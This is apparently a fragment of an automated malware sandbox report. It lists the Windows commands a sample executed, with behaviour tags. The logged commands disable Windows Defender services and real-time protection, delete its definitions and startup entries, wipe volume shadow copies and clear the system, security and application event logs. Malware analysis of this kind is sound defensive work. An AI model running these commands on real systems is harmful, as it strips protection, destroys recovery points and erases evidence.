  [2] C:\Windows\SysWOW64\schtasks.exe  (PID 1340)
      cmd: schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  [2] C:\Windows\SysWOW64\reg.exe  (PID 1516)
      cmd: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  [2] C:\Windows\SysWOW64\reg.exe  (PID 1776)
      cmd: reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  [2] C:\Windows\SysWOW64\reg.exe  (PID 2172)
      cmd: reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
  [2] C:\Windows\SysWOW64\reg.exe  (PID 2020)
      cmd: reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
      - Modifies registry class
  [2] C:\Windows\SysWOW64\reg.exe  (PID 2292)
      cmd: reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
      - Modifies registry class
  [2] C:\Windows\SysWOW64\reg.exe  (PID 3112)
      cmd: reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
      - Modifies registry class
  [2] C:\Windows\SysWOW64\reg.exe  (PID 3836)
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  [2] C:\Windows\SysWOW64\reg.exe  (PID 1616)
      cmd: reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:1564
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:3844
-
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f2⤵
- Modifies security service
PID:1864 -
C:\Windows\SysWOW64\reg.exereg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f2⤵PID:4372
-
C:\Windows\SysWOW64\vssadmin.exevssadmin.exe delete shadows /all /quiet2⤵
- Interacts with shadow copies
PID:2192 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl system2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4000 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl security2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4040 -
C:\Windows\SysWOW64\wevtutil.exewevtutil.exe cl application2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4092 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe SHADOWCOPY /nointeractive2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3128 -
C:\Windows\SysWOW64\Wbem\wmic.exewmic.exe shadowcopy delete2⤵
- Suspicious use of AdjustPrivilegeToken
PID:4316 -
C:\Windows\SysWOW64\cmd.execmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All2⤵PID:736
-
C:\Program Files\Windows Defender\MpCmdRun.exe"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All3⤵
- Deletes Windows Defender Definitions
PID:4344 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true2⤵PID:4356
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIOAVProtection $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3280 -
C:\Windows\SysWOW64\cmd.execmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true2⤵PID:1544
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableRealtimeMonitoring $true3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2148
Network
MITRE ATT&CK Enterprise v6
Downloads